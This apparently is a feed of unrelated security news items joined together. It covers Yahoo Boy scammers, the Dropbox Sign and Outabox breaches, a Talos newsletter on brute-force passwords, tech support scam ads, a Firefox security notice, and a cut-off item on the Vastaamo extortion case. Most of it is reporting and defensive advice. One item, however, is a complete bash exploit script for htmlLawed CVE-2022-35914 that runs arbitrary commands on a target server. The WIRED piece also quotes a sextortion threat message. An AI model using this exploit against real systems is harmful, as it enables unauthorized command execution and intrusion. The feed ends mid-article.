“Yahoo Boy” cybercriminals are openly running dozens of scams across Facebook, WhatsApp, Telegram, TikTok, YouTube, and more.

Most scammers and cybercriminals operate in the digital shadows and don’t want you to know how they make money. But that’s not the case for the Yahoo Boys, a loose collective of young men in West Africa who are some of the web’s most prolific—and increasingly dangerous—scammers.

Thousands of people are members of dozens of Yahoo Boy groups operating across Facebook, WhatsApp, and Telegram, a WIRED analysis has found. The scammers, who deal in types of fraud that total hundreds of millions of dollars each year, also have dozens of accounts on TikTok, YouTube, and the document-sharing service Scribd that are getting thousands of views.

Inside the groups, there’s a hive of fraudulent activity with the cybercriminals often showing their faces and sharing ways to scam people with other members. They openly distribute scripts detailing how to blackmail people and how to run sextortion scams—that have driven people to take their own lives—sell albums with hundreds of photographs, and advertise fake social media accounts. Among the scams, they’re also using AI to create fake “nude” images of people and real-time deepfake video calls.

The Yahoo Boys don’t disguise their activity. Many groups use “Yahoo Boys” in their name as well as other related terms. WIRED’s analysis found 16 Yahoo Boys Facebook groups with almost 200,000 total members, a dozen WhatsApp channels, around 10 Telegram channels, 20 TikTok accounts, a dozen YouTube accounts, and more than 80 scripts on Scribd. And that’s just the tip of the iceberg.

Broadly, the companies do not allow content on their platforms that encourages or promotes criminal behavior. The majority of the Yahoo Boys accounts and groups WIRED identified were removed after we contacted the companies about the groups’ overt existence. Despite these removals, dozens more Yahoo Boys groups and accounts remain online.

“They’re not hiding under different names,” says Kathy Waters, the cofounder and executive director of the nonprofit Advocating Against Romance Scammers, which has tracked the Yahoo Boys for years. Waters says the social media companies are essentially providing the Yahoo Boys with “free office space” to organize and conduct their activities. “They’re selling scripts, selling photos, identifications of people, all online, all on the social media platforms,” she says. “Why these accounts still remain is beyond me.”

The Yahoo Boys aren’t a single, organized group. Instead, they’re a collection of thousands of scammers who work individually or in clusters. Often based in Nigeria, their name comes from formerly targeting users of Yahoo services, with links back to the Nigerian Prince email scams of old. Groups in West Africa can be often organized in various confraternities, which are cultish gangs.

“Yahoo is a set of knowledge that allows you to conduct scams,” says Gary Warner, the director of intelligence at DarkTower and director of the University of Alabama at Birmingham’s Computer Forensics Research Laboratory. While there are different levels of sophistication of Yahoo Boys, Warner says, many simply operate from their phones. “Most of these threat actors are only using one device,” he says.

The Yahoo Boys run dozens of scams—from romance fraud to business email compromise. When making contact with potential victims, they’ll often “bomb” people by sending hundreds of messages to dating app accounts or Facebook profiles. “They will say anything they can in order to get the next dime in their pocket,” Waters says.

Searching for the Yahoo Boys on Facebook brings up two warnings: Both say the results may be linked to fraudulent activity, which isn’t allowed on the website. Clicking through the warnings reveals Yahoo Boy groups with thousands of members—one had more than 70,000.

Within the groups—alongside posts selling SIM cards and albums with hundreds of pictures—many of the scammers push people toward other messaging platforms such as Meta’s WhatsApp or Telegram. Here, the Yahoo Boys are at their most bold. Some groups and channels on the two platforms receive hundreds of posts per day and are part of their wider web of operations.

After WIRED asked Facebook about the 16 groups we identified, the company removed them, and some WhatsApp groups were deactivated. “Scammers use every platform available to them to defraud people and constantly adapt to avoid getting caught,” says Al Tolan, a Meta spokesperson. They did not directly address the accounts that were removed or that they were easy to find. “Purposefully exploiting others for money is against our policies, and we take action when we become aware of it,” Tolan says. “We continue to invest in technology and cooperate with law enforcement so they can prosecute scammers. We also actively share tips on how people can protect themselves, their accounts, and avoid scams.”

Groups on Telegram were removed after WIRED messaged the company’s press office; however, the platform did not respond about why it had removed them.

Across all types of social media, Yahoo Boys scammers share “scripts” that they use to socially manipulate people—these can run to thousands of words long and can be copied and pasted to different victims. Many have been online for years. “I’ve seen some scripts that are 30 and 60 layers deep, before the scammer actually would have to go and think of something else to say,” says Ronnie Tokazowski, the chief fraud fighter at Intelligence for Good, which works with cybercrime victims. “It’s 100 percent how they'll manipulate the people,” Tokazowski says.

Among the many scams, they pretend to be military officers, people offering “hookups,” the FBI, doctors, and people looking for love. One “good morning” script includes around a dozen messages the scammers can send to their targets. “In a world full of deceit and lies, I feel lucky when see the love in your eyes. Good morning,” one says. But things get much darker.

The Yahoo Boys have been behind a recent wave of sextortion across the United States and elsewhere, says Paul Raffile, an intelligence analyst at the Network Contagion Research Institute who is closely tracking the criminals. Broadly speaking, during sextortion, a scammer will use intimate or explicit images to try to get someone to pay them money. “The Yahoo Boys are the principal threat actor behind the surge of sextortion that we’re seeing over the past 18 months,” Raffile says. “They are responsible for forcing dozens of teens to suicide.”

In a series of posts in one Telegram channel, highlighted by Warner, who is also involved in Intelligence for Good, one cybercriminal can be seen walking others through how to run a sextortion scam. They say they tricked people into sharing nude images—posting screenshots of the conversation—and explained ways other people can replicate it. “Hey I am posting your naked pictures on social media and Facebook,” says a sample message cybercriminals could use. “Am not just posting it am sending copies of it to your area,” the message says, before demanding $700.

While the scripts like these are shared on all social media channels, WIRED found at least 80 on the document-sharing service Scribd. The company removed them after WIRED got in touch, with a spokesperson saying there are limits on what people can upload and that the company has automated and manual reviews to remove content. “We’re actively building out new capabilities to broaden the scope of content moderation coverage to include a wider range of concerning text and image violations,” the spokesperson says. Some of the scripts had been online since 2020, and on pages where they were removed a “reading suggestions” section recommended other scam scripts.

Raffile says the Yahoo Boys have been able to “thrive” online “due to lack of moderation around all the illicit material” that they’re sharing. “They’re acting with impunity because they feel they will never get caught,” Raffile says.

Beyond the messaging platforms, the Yahoo Boys have a presence on TikTok and YouTube. “We design our app to be inhospitable to those who seek to exploit our community and we’ve removed this content for violating our policies,” a TikTok spokesperson says.

“Our policies prohibit spam, scams, or other deceptive practices that take advantage of the YouTube community,” a YouTube spokesperson says. “We also prohibit videos that encourage illegal or dangerous activities. As such, we have terminated the flagged channels for violating our policies and our terms of service.” They add that the company removed accounts for breaching policies about harmful content, spam, and generally violating its terms of service.

The accounts posted tutorials about how to scam people, link to groups on messaging apps, and promote technology for fake video calls. On TikTok, multiple accounts include carousels of images that the scammers can use in their efforts to create believable personas. Some of these include posts of elderly women for scammers who are in “need of grandma pictures for proof” of their fake identities and others for scammers who “need kids pics” for their victims.

As well as being a threat to thousands of people around the world, the Yahoo Boys can be quick to adopt new technologies. David Maimon, a professor at Georgia State University and the head of fraud insights at the identity-verification firm SentiLink, has monitored Yahoo Boys for years and says their techniques have evolved alongside new technologies.

“To build rapport with victims, the fraudsters first used text messages, then started sending recorded audio messages, to now using deepfake tools to communicate with victims live,” Maimon says. “On some of the markets we now also see the use of cloned voices. It is now accompanied with sending physical items to victims such as presents, food deliveries, and flowers.” Within some groups, they use “nudification” tools to turn photos of people clothed into nude photos, and deepfake video calls.

While the Yahoo Boys have been active for years, all the experts spoken to for this piece say they should be treated more seriously by social media companies and law enforcement. “It’s time that we start looking at Yahoo Boys as a dangerous organization, transnational organized crime, and start giving it some of those labels,” Raffile says.

These Dangerous Scammers Don’t Even Bother to Hide Their Crimes

The startup says its SaaS platform helps organizations detect and recover from ransomware attacks faster than "traditional" methods.

Source: Ihor Sveitukha via Alamy Stock Photo

The number of ransomware and associated extortion attacks is growing, with reports nearly every day about damage inflicted on organizations. These attacks disrupt business operations and result in significant downtime. In some cases, data is stolen. Educational institutions, retail and healthcare entities, and critical infrastructure organizations have all been targeted over the past few months.

Mimic, which came out of stealth today, is a ransomware defense company that offers a way for organizations to detect, deflect, and recover from ransomware attacks. The company says its software-as-a-service platform is capable of restoring an organization's environment and data back to an uninfected state within 24 hours without needing to pay a ransom.

Details about the technology are sparse, but the company has the support of several well-known names, including Ted Schlein, general partner at Ballistic Ventures, who joined the board of directors; and Marie Mouchet, former CIO of Colonial Pipeline, who joined the advisory board.

Mimic's platform works "in concert" with a customer's existing security controls, said Mimic CEO Derek Smith in a statement. Smith was formerly CEO of Shape Security, a Web and mobile application security company that was acquired by F5 in 2019 for $1 billion. 

As part of the launch, Mimic raised $27 million in seed funding from Ballistic Ventures, Menlo Ventures, Team8, Wing Venture Capital, and Shield Capital. The company said Apex Group, a financial services provider, is currently using the platform.

**About the Author(s)**

Mimic Launches With New Ransomware Defense Platform

After a breach in the Dropbox Sign environment, customer information may have been stolen and API users have restricted functionality

Dropbox is reporting a recent “security incident” in which an attacker gained unauthorized access to the Dropbox Sign (formerly HelloSign) production environment. During this access, the attacker had access to Dropbox Sign customer information.

Dropbox Sign is a platform that allows customers to digitally sign, edit, and track documents. The accessed customer information includes email addresses, usernames, phone numbers, and hashed passwords, in addition to general account settings and certain authentication information such as API keys, OAuth tokens, and multi-factor authentication. The access is limited to Dropbox Sign customers and does not affect users of other Dropbox services because the environments are largely separate.

> “We believe that this incident was isolated to Dropbox Sign infrastructure and did not impact any other Dropbox products.”

Even if you never created a Dropbox Sign account but received or signed a document through Dropbox Sign, your email addresses and names were exposed. In a government (K-8) filing about the incident, Dropbox says it found no evidence of unauthorized access to the contents of customers’ accounts (i.e. their documents or agreements), or their payment information. 

The attacker compromised a back-end service account that acted as an automated system configuration tool for the Dropbox Sign environment. The attacker used the privileges of the service account for the production environment to gain access to the customer database.

To limit the aftermath of the incident, Dropbox’s security team reset users’ passwords, logged users out of any devices they had connected to Dropbox Sign, and is coordinating the rotation of all API keys and OAuth tokens.

For customers with API access to Dropbox Sign, the company said new API keys will need to be generated and warned that certain functionality will be restricted while they deal with the breach.

Dropbox says it has reported this event to data protection regulators and law enforcement.

**Recommendations**

Dropbox expired affected passwords and logged users out of any devices they had connected to Dropbox Sign for further protection. The next time these users log in to their Sign account, they’ll be sent an email to reset the password. Dropbox recommends users do this as soon as possible.

If you’re an API customer, to ensure the security of your account, you’ll need to rotate your API key by generating a new one, configuring it with your application, and deleting your current one. Here is how you can easily create a new key.

API customers should be aware that names and email addresses for those who received or signed a document through Dropbox Sign, even if they never created an account, were exposed. So, this may impact their customers.

Customers who use an authenticator app for multi-factor authentication should reset it. Please delete your existing entry and then reset it. If you use SMS you do not need to take any action.

If you reused your Dropbox Sign password on any other services, we strongly recommend that you change your password on those accounts and use multi-factor authentication when available.

****Protecting yourself from a data breach****

There are some actions you can take if you are, or suspect you may have been, the victim of a data breach.

*   **Check the vendor’s advice.** Every breach is different, so check with the vendor to find out what’s happened and follow any specific advice they offer.
*   **Change your password.** You can make a stolen password useless to thieves by changing it. Choose a strong password that you don’t use for anything else. Better yet, let a password manager choose one for you.
*   **Enable two-factor authentication (2FA).** If you can, use a FIDO2-compliant hardware key, laptop, or phone as your second factor. Some forms of two-factor authentication (2FA) can be phished just as easily as a password. 2FA that relies on a FIDO2 device can’t be phished.
*   **Watch out for fake vendors.** The thieves may contact you posing as the vendor. Check the vendor website to see if they are contacting victims and verify any contacts using a different communication channel.
*   **Take your time.** Phishing attacks often impersonate people or brands you know, and use themes that require urgent attention, such as missed deliveries, account suspensions, and security alerts.
*   **Set up identity monitoring.** Identity monitoring alerts you if your personal information is found being traded illegally online, and helps you recover after.

Malwarebytes has a new free tool for you to check how much of your personal data has been exposed online. Submit your email address (it’s best to give the one you most frequently use) to our free Digital Footprint scan and we’ll give you a report and recommendations.

**We don’t just report on threats – we help safeguard your entire digital identit**y

Cybersecurity risks should never spread beyond a headline. Protect your—and your family’s—personal information by using identity protection

 Dropbox Sign customer data accessed in breach 

There are some classics on this list — the ever-present “Password” password, Passw0rd (with a zero, not an “O”) and “123456.”

Thursday, May 2, 2024 14:00

Brute force attacks are one of the most elementary cyber threats out there. Technically, anyone with a keyboard and some free time could launch one of them — just try a bunch of different username and password combinations on the website of your choice until you get blocked.  

Nick Biasini and I discussed some of the ways that organizations can defend against brute force attacks since detection usually doesn’t fall into the usual bucket (ex., there’s nothing an anti-virus program could detect running). But a good place to start just seems to be implementing strong password rules, because people, unsurprisingly, are still using some of the most obvious passwords that anyone, attacker or not, would guess. 

Along with our advisory on a recent increase in brute force attacks targeting SSH and VPN services Cisco Talos published a list of IP addresses associated with this activity, along with a list of usernames and passwords adversaries typically try to use to gain access to a network or service. 

There are some classics on this list — the ever-present “Password” password, Passw0rd (with a zero, not an “O”) and “123456.” This tells me that users still haven’t learned their lesson. It’s somewhat funny to think about some well-funded actor just being like, “Well, let me try to ‘hack’ into this machine by using ‘123456’” as if they’re in a parody movie, but if they already can guess a username based off someone’s real name, it’s not that unlikely that password is being used somewhere. 

A few other example passwords stood out to me: “Mart1x21,” because I can’t tell if this is just someone named “Martin” or a play on the month of March, and things like “Spring2024x21” and “April2024x21” because I appreciate the idea that someone using that weak of a password thinks that adding the extra three characters onto “April2024” is really going to throw an attacker off. 

Looking at this list got me thinking about what some potential solutions are to the internet’s password problem, and our ever-present battle to educate users and warn them about the dangers of using weak or default passwords. 

Going passwordless is certainly one option because if there just are no passwords to log in, there’s nothing text-based an attacker could just start guessing. 

The best solution I’ve seen recently is that the U.K. literally made a law requiring hardware and software manufacturers to implement stronger security standards. The Product Security and Telecommunications Infrastructure (PSTI) that went into effect last month contains a range of security protections companies must follow, but they now include mandatory password rules that will force users to change default passwords when registering for new accounts and stop them from using easy-to-guess passwords like “Admin” and “12345.”  

It would be great if users would just stop using these credentials on their own, but if attackers are still thinking that someone out there is using “Password” as their password, they probably are.  

**The one big thing **

For the first time in several quarters, business email compromise (BEC) was the most common threat in Cisco Talos Incident Response (Talos IR) engagements during the first quarter of 2024. BEC made up 46 percent of all engagements in Q1, a significant spike from Q4 2023, according to the latest Talos IR Quarterly Trends Report. Ransomware, which was the top-observed threat in the last quarter of 2023, decreased by 11 percent. Talos IR also observed a variety of threats in engagements, including data theft extortion, brute-force activity targeting VPNs, and the previously seen commodity loader Gootloader. 

**Why do I care? **

BEC is a tactic adversaries use to disguise themselves as legitimate members of a business and send phishing emails to other employees or third parties, often pointing to a malicious payload or engineering a scheme to steal money. The use of email-hiding inbox rules was the top-observed defense evasion technique, accounting for 21 percent of engagements this quarter, which was likely due to an increase in BEC and phishing within engagements. These are all valuable insights from the field provided in Talos IR’s full report. 

**So now what? **

There are some known indicators of compromise that customers can look for if they suspect The lack of MFA remains one of the biggest impediments for enterprise security. All organizations should implement some form of MFA, such as Cisco Duo. The implementation of MFA and a single sign-on system can ensure only trusted parties are accessing corporate email accounts, to prevent the spread of BEC. If you’d like to read about other lessons from recent Talos IR engagements, read the one-pager here or the blog post here. 

**Top security headlines of the week **

**The chief executive of UnitedHealth Group testified to U.S. Congress on Wednesday regarding the recent cyber attack against Change Healthcare.** Change’s operations went nearly completely dark for weeks earlier this year after a data breach, which likely resulted in millions of patients’ records and personal information being accessed. Lawmakers questioned whether UnitedHealth was too involved in the nation’s medical systems, as Change manages a third of all American patient records and processes more than 15 billion transactions a year at doctor’s offices, hospitals and other medical providers. As a result of the outage, some healthcare practitioners went more than a month without being paid, and many had to tap into their personal funds to keep offices open. UnitedHealth’s CEO told Congress the company was still working to figure out the full extent of the campaign and was talking to U.S. agencies about how to best notify individuals who were affected. The hearing has also generated a conversation around consolidation in the American healthcare industry and whether some groups are controlling too much of the patient base. (The New York Times, CNBC) 

**Vulnerabilities in a popular phone tracking app could allow anyone to view all users’ locations.** A security researcher recently found that iSharing, which allows users to see the exact location of a device, contains a vulnerability that prevented the app's servers from conducting proper checks of user data access. iSharing is advertised as an app for users who want to track friends' and family members’ locations or as an extra layer of security if their device were to be lost or stolen. The flaws also exposed users’ names, profile pictures, email addresses and phone numbers. The researcher who discovered the vulnerability was able to show a proof-of-concept exploitation almost immediately after creating a brand new account on the app. Representatives from the developers of iSharing told TechCrunch that the company’s logs did not show any signs of the vulnerability being exploited prior to the researcher’s disclosure. These types of apps can also be used as “stalkerware,” in which someone who knows a targeted user quietly downloads the app on a target’s phone, and then uses it to remotely track their location. (TechCrunch) 

**Adversaries are hiding malware in GitHub comments, disguising malicious code as URLs associated with Microsoft repositories, and making the files appear trustworthy.** Although some security researchers view this as a vulnerability, Microsoft maintains that it is merely a feature of using GitHub. While adversaries have so far mainly abused this feature to mirror Microsoft URLs, it could theoretically be used to create convincing lures on any GitHub repository. When a user leaves a comment in GitHub, they can attach a file, which is then uploaded to GitHub’s CDN and associated with the related project using a unique URL. GitHub automatically generates the link to download that attachment after adding the file to an unsaved comment, allowing threat actors to attach malware to any repository without the administrators knowing. This method has already been abused to distribute the Readline information-stealing trojan by attaching comments to Microsoft’s GitHub-hosted repositories for “vcpkg” and “STL.” The malicious URL will even still work if the poster deletes the comment, allowing them to reuse the GitHub-generated URL. (Bleeping Computer, Dark Reading) 

**Can’t get enough Talos? ** 

*   Cisco Talos at RSAC 2024 
*   Cisco Zero-Days Anchor 'ArcaneDoor' Cyber-Espionage Campaign 
*   Governments issue alerts after 'sophisticated' state-backed actor found exploiting flaws in Cisco security boxes 
*   Vulnerabilities in employee management system could lead to remote code execution, login credential theft 
*   Researcher Spotlight: James Nutland studies what makes threat actors tick, growing our understanding of the current APT landscape 

**Upcoming events where you can find Talos**

**RSA** **(May 6 - 9)** 

_San Francisco, California_    

**ISC2 SECURE Europe** **(May 29)** 

_Amsterdam, Netherlands_ 

> _Gergana Karadzhova-Dangela from Cisco Talos Incident Response will participate in a panel on “Using ECSF to Reduce the Cybersecurity Workforce and Skills Gap in the EU.” Karadzhova-Dangela participated in the creation of the EU cybersecurity framework, and will discuss how Cisco has used it for several of its internal initiatives as a way to recruit and hire new talent._  

**Cisco Live** **(June 2 - 6)** 

_Las Vegas, Nevada_  

**Most prevalent malware files from Talos telemetry over the past week **

_This section will be on a brief hiatus while we work through some technical difficulties._

What can we learn from the passwords used in brute-force attacks?

This vulnerability was a potential CSRF attack. When running the Firebase emulator suite, there is an export endpoint that is used normally to export data from running emulators. If a user was running the emulator and navigated to a malicious website with the exploit on a browser that allowed calls to localhost (ie Chrome before v94), the website could exfiltrate emulator data. We recommend upgrading past version 13.6.0 or [commit 068a2b08dc308c7ab4b569617f5fc8821237e3a0](https://github.com/firebase/firebase-tools/commit/068a2b08dc308c7ab4b569617f5fc8821237e3a0).


**Firebase vulnerable to CRSF attack**

Low severity GitHub Reviewed Published May 2, 2024 to the GitHub Advisory Database • Updated May 3, 2024

GHSA-rcm2-22f3-pqv3: Firebase vulnerable to CRSF attack

Outabox, an Australian firm that scanned faces for bars and clubs, suffered a breach that shows the problems with giving companies your biometric data.

Police and federal agencies are responding to a massive breach of personal data linked to a facial recognition scheme that was implemented in bars and clubs across Australia. The incident highlights emerging privacy concerns as AI-powered facial recognition becomes more widely used everywhere from shopping malls to sporting events.

The affected company is Australia-based Outabox, which also has offices in the United States and the Philippines. In response to the Covid-19 pandemic, Outabox debuted a facial recognition kiosk that scans visitors and checks their temperature. The kiosks can also be used to identify problem gamblers who enrolled in a self-exclusion initiative. This week, a website called “Have I Been Outaboxed” emerged, claiming to be set up by former Outabox developers in the Philippines. The website asks visitors to enter their name to check whether their information had been included in a database of Outabox data, which the site alleges had lax internal controls and was shared in an unsecured spreadsheet. It claims to have more than 1 million records.

The incident has rankled privacy experts who have long set off alarm bells over the creep of facial recognition systems in public spaces such as clubs and casinos.

“Sadly, this is a horrible example of what can happen as a result of implementing privacy-invasive facial recognition systems,” Samantha Floreani, head of policy for Australia-based privacy and security nonprofit Digital Rights Watch, tells WIRED. “When privacy advocates warn of the risks associated with surveillance-based systems like this, data breaches are one of them.”

According to the Have I Been Outaboxed website, the data includes “facial recognition biometric, driver licence \[sic\] scan, signature, club membership data, address, birthday, phone number, club visit timestamps, slot machine usage.” It claims Outabox exported the “entire membership data” of IGT, a supplier of gambling machines. IGT vice president of global communications Phil O’Shaughnessy tells WIRED that “the data affected by this incident has not been obtained from IGT,” and that the firm would work with Outabox and law enforcement.

The website’s owners posted a photo, signature, and redacted driver license belonging to one of Outabox’s founders, as well as a redacted screenshot of the alleged internal spreadsheet. WIRED was unable to independently verify the identity of the website’s owners or the authenticity of the data they claimed to have. An email sent to an address on the website was not returned.

"Outabox is aware and responding to a cyber incident potentially involving some personal information,” an Outabox spokesperson tells WIRED. “We have been in communication with a group of our clients to inform them and outline our strategy to respond. Due to the ongoing Australian police investigation, we are not able to provide further information at this time.”

The New South Wales police force confirmed to WIRED that it was investigating a data breach on Wednesday, but a spokesperson declined to share further details. On Thursday, the force announced that it, working alongside federal and state agencies, had arrested an unnamed 46-year-old man in a Sydney suburb. He is expected to be charged with blackmail.

Clubs that used Outabox’s technology posted announcements about the incident and notified clients this week. One person who posted a breach notification from a club they visited recounted their experience with the facial recognition system. “My fondest memory of this system is visiting a club and having it confidently match my face to a member that was clearly 20+ years older than me, and looked nothing like me,” they wrote in a post on X. The club did not respond to a request for comment.

The Have I Been Outaboxed website, which is still online at the time of writing, alleges that Outabox stopped paying its developers in the Philippines. AI companies frequently employ low-cost overseas labor, including in the Philippines, to power their systems. The website encourages anybody whose data is included in the breach to contact venues and ask that they remove Outabox’s system. The site, which was set up last week according to online records, lists 19 venues. WIRED searched the database for prominent Australians including politicians, and it returned redacted results listing their name and the venues they allegedly attended.

“We are aware of a malicious website carrying a number of false statements designed to harm our business and defame our senior staff,” the Outabox spokesperson says. “We believe this is linked and urge people not to repeat false and reputationally damaging misinformation.” Outabox declined to specify which statements are false, citing the police investigation.

It’s unclear how much of the story told on the website is true, or whether the perpetrators even have the claimed biometric data. Australian cybersecurity expert Troy Hunt, founder of the breach notification website Have I Been Pwned, tells WIRED that there is little reason to doubt it at this time.

“I haven’t seen any reason not to take this at face value, which means they have exactly what they say they have,” he says. In posts on X, Hunt speculated that the website’s posting may have been preceded by demands that were not met, and that the perpetrators’ actions now “clearly land” in the realm of criminality.

“Offshoring is a messy discussion between the legalities of data sovereignty, perceived shortcomings of foreign labor, and frankly, a big dose of xenophobia,” Hunt says. “It’s not like Aussie developers doing exactly the same thing would have made this OK.”

Floreani of Digital Rights Watch says that the incident illustrates the “significant negative consequences” that can arise from collecting sensitive biometric data. “We need bold privacy reform and strict limitations on facial recognition technology,” she says. “As always, surveillance isn’t safety.”

The Breach of a Face Recognition Firm Reveals a Hidden Danger of Biometrics

Our researchers found fake sponsored search results that lead consumers to a typical fake Microsoft alert site set up by tech support scammers.

_This blog post was written based on research carried out by Jérôme Segura._

A campaign using sponsored search results is targeting home users and taking them to tech support scams.

Sponsored search results are the ones that are listed at the top of search results and are labelled “Sponsored”. They’re often ads that are taken out by brands who want to get people to click through to their website. In the case of malicious sponsored ads, scammers tend to outbid the brands in order to be listed as the first search result.

The criminals that buy the ads will go as far as displaying the official brand’s website within the ad snippet, making it hard for an unsuspecting visitor to notice a difference.

Who would, for example, be able to spot that the below ad for CNN is not legitimate. You’ll have to click on the three dots (in front of where we added malicious ad) and look at the advertiser information to see that it’s not the legitimate owner of the brand.

Only then it becomes apparent that the real advertiser is not CNN, but instead a company called Yojoy Network Technology Co., Limited.

Below, you can see another fake advertisement by the same advertiser, this time impersonating Amazon.

In our example, the scammers failed to use the correct CNN or Amazon icons, but in other cases (like another recent discovery by Jerome Segura), scammers have even used the correct icon.

The systems of the people that click one of these links are likely to assessed on what the most profitable follow-up is (using a method called fingerprinting). For systems running Windows, we found visitors are redirected to tech support scam websites such as this one.

_Tech Support Scam site telling the visitor to call 1-844-476-5780_

You undoubtedly know the type. Endless pop-ups, soundbites, and prompts telling the visitor that they should urgently call the displayed number to free their system of alleged malware.

These tech support scammers will impersonate legitimate software companies (i.e. Microsoft) and charge their victims hundreds or even thousands of dollars for completely bogus malware removal.

**Getting help if you have been scammed**

Getting scammed is one of the worst feelings to experience. In many ways, you may feel like you have been violated and angry to have let your guard down. Perhaps you are even shocked and scared, and don’t really know what to do now. The following tips will hopefully provide you with some guidance.

**If you’ve already let the scammers in**

*   Revoke any remote access the scammer has (if you are unsure, restart your computer). That should cut the remote session and kick them out of your computer.
*   Scan your computer for malware. The miscreants may have installed password stealers or other Trojans to capture your keystrokes. Use a program such as Malwarebytes to quickly identify and remove threats.
*   Change all your passwords. (Windows password, email, banking, etc.)

**If you’ve already paid**

*   Contact your financial institution/credit card company to reverse the charges and keep an eye out for future unwanted charges.
*   If you gave them personal information such as date of birth, Social Security Number, full address, name, and maiden name, you may want to look at some form of identity theft protection.

****Reporting the scam****

**File a report**

*   In the US: File a complaint (FTC)
*   In Canada: Contact law enforcement
*   In the UK: Report fraud | Report a cold call
*   In Australia: Report a scam

**Shut down their remote software account**

*   Write down the TeamViewer ID (9-digit code) and send it to TeamViewer’s support. They can later use the information you provide to block people/companies.
*   LogMeIn: Report abuse

**Spread the word**

You can raise awareness by letting your friends, family, and other acquaintances know what happened to you. Although sharing your experience of falling victim to these scams may be embarrassing, educating other people will help someone caught in a similar situation and deter further scam attempts.

**We don’t just report on threats – we help safeguard your entire digital identit**y

Cybersecurity risks should never spread beyond a headline. Protect your—and your family’s—personal information by using identity protection

 Watch out for tech support scams lurking in sponsored search results 

Ubuntu Security Notice 6747-2 - USN-6747-1 fixed vulnerabilities in Firefox. The update introduced several minor regressions. This update fixes the problem. Multiple security issues were discovered in Firefox. If a user were tricked into opening a specially crafted website, an attacker could potentially exploit these to cause a denial of service, obtain sensitive information across domains, or execute arbitrary code. Bartek Nowotarski discovered that Firefox did not properly limit HTTP/2 CONTINUATION frames. An attacker could potentially exploit this issue to cause a denial of service. Gary Kwong discovered that Firefox did not properly manage memory when running garbage collection during realm initialization. An attacker could potentially exploit this issue to cause a denial of service, or execute arbitrary code. Lukas Bernhard discovered that Firefox did not properly manage memory during JIT optimizations, leading to an out-of-bounds read vulnerability. An attacker could possibly use this issue to cause a denial of service or expose sensitive information. Nan Wang discovered that Firefox did not properly manage memory during WASM garbage collection. An attacker could potentially exploit this issue to cause a denial of service, or execute arbitrary code. Various other issues were also addressed.

==========================================================================  
Ubuntu Security Notice USN-6747-2  
May 02, 2024

firefox regressions  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 20.04 LTS

Summary:

USN-6747-1 caused some minor regressions in Firefox.

Software Description:  
- firefox: Mozilla Open Source web browser

Details:

USN-6747-1 fixed vulnerabilities in Firefox. The update introduced  
several minor regressions. This update fixes the problem.

Original advisory details:

 Multiple security issues were discovered in Firefox. If a user were  
 tricked into opening a specially crafted website, an attacker could  
 potentially exploit these to cause a denial of service, obtain sensitive  
 information across domains, or execute arbitrary code. (CVE-2024-3852,  
 CVE-2024-3864, CVE-2024-3865)

  Bartek Nowotarski discovered that Firefox did not properly limit HTTP/2  
 CONTINUATION frames. An attacker could potentially exploit this issue to  
 cause a denial of service. (CVE-2024-3302)

  Gary Kwong discovered that Firefox did not properly manage memory when  
 running garbage collection during realm initialization. An attacker could  
 potentially exploit this issue to cause a denial of service, or execute  
 arbitrary code. (CVE-2024-3853)

  Lukas Bernhard discovered that Firefox did not properly manage memory  
 during JIT optimisations, leading to an out-of-bounds read vulnerability.  
 An attacker could possibly use this issue to cause a denial of service or  
 expose sensitive information. (CVE-2024-3854, CVE-2024-3855)

  Nan Wang discovered that Firefox did not properly manage memory during  
 WASM garbage collection. An attacker could potentially exploit this issue  
 to cause a denial of service, or execute arbitrary code. (CVE-2024-3856)

  Lukas Bernhard discovered that Firefox did not properly manage memory  
 when handling JIT created code during garbage collection. An attacker  
 could potentially exploit this issue to cause a denial of service, or  
 execute arbitrary code. (CVE-2024-3857)

  Lukas Bernhard discovered that Firefox did not properly manage memory when  
 tracing in JIT. An attacker could potentially exploit this issue to cause  
 a denial of service. (CVE-2024-3858)

  Ronald Crane discovered that Firefox did not properly manage memory in the  
 OpenType sanitizer on 32-bit devices, leading to an out-of-bounds read   
 vulnerability. An attacker could possibly use this issue to cause a denial  
 of service or expose sensitive information. (CVE-2024-3859)

  Garry Kwong discovered that Firefox did not properly manage memory when  
 tracing empty shape lists in JIT. An attacker could potentially exploit   
 this issue to cause a denial of service. (CVE-2024-3860)

  Ronald Crane discovered that Firefox did not properly manage memory when  
 handling an AlignedBuffer. An attacker could potentially exploit this   
 issue to cause denial of service, or execute arbitrary code.   
 (CVE-2024-3861)

  Ronald Crane discovered that Firefox did not properly manage memory when  
 handling code in MarkStack. An attacker could possibly use this issue to  
 cause a denial of service or execute arbitrary code. (CVE-2024-3862)

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 20.04 LTS  
  firefox                         125.0.3+build1-0ubuntu0.20.04.1

After a standard system update you need to restart Firefox to make all the  
necessary changes.

References:  
  https://ubuntu.com/security/notices/USN-6747-2  
  https://ubuntu.com/security/notices/USN-6747-1  
  https://launchpad.net/bugs/2064553

Package Information:  
  https://launchpad.net/ubuntu/+source/firefox/125.0.3+build1-0ubuntu0.20.04.1

Ubuntu Security Notice USN-6747-2

htmlLawed versions 1.2.5 and below proof of concept remote command execution exploit.

    #!/bin/bash# Exploit Title: htmlLawed <= 1.2.5 - Remote Code Execution# Date: 2024-05-02# Exploit Author: Miguel Redondo (aka d4t4s3c)# Vendor Homepage: https://www.bioinformatics.org/phplabware/internal_utilities/htmLawed# Software Link: https://github.com/kesar/HTMLawed# Version: <= 1.2.5# Tested on: Linux# Category: Web Application# CVE: CVE-2022-35914while getopts ":u:c:" arg; do  case ${arg} in    u) url=${OPTARG}; let parameter_counter+=1 ;;    c) cmd=${OPTARG}; let parameter_counter+=1 ;;  esacdoneif [ -z "${url}" ] || [ -z "${cmd}" ]; then  echo -e "\n[*] htmlLawed <= 1.2.5 - Remote Code Execution"  echo -e "\n[-] Usage: CVE-2022-35914.sh -u <url> -c <cmd>\n"  exit 1else  echo -e "\n[*] htmlLawed <= 1.2.5 - Remote Code Execution"  echo -e "\n[+] Executing Command: ${cmd}\n"  cmd_output=$(curl -s -d "sid=foo&hhook=exec&text=${cmd}" -b "sid=foo" ${url} | egrep '\&nbsp; \[[0-9]+\] =\>' | sed -E 's/\&nbsp; \[[0-9]+\] =\> (.*)<br \/>/\1/')  echo -e "${cmd_output}\n"  exit 0fi

htmlLawed 1.2.5 Remote Command Execution

The hacker behind the extortion of mental health clinic Vastaamo and its clients has been convicted to over 6 years in jail.

On October 30, 2020, I started a article with the words:

“Hell is too nice a place for these people.”

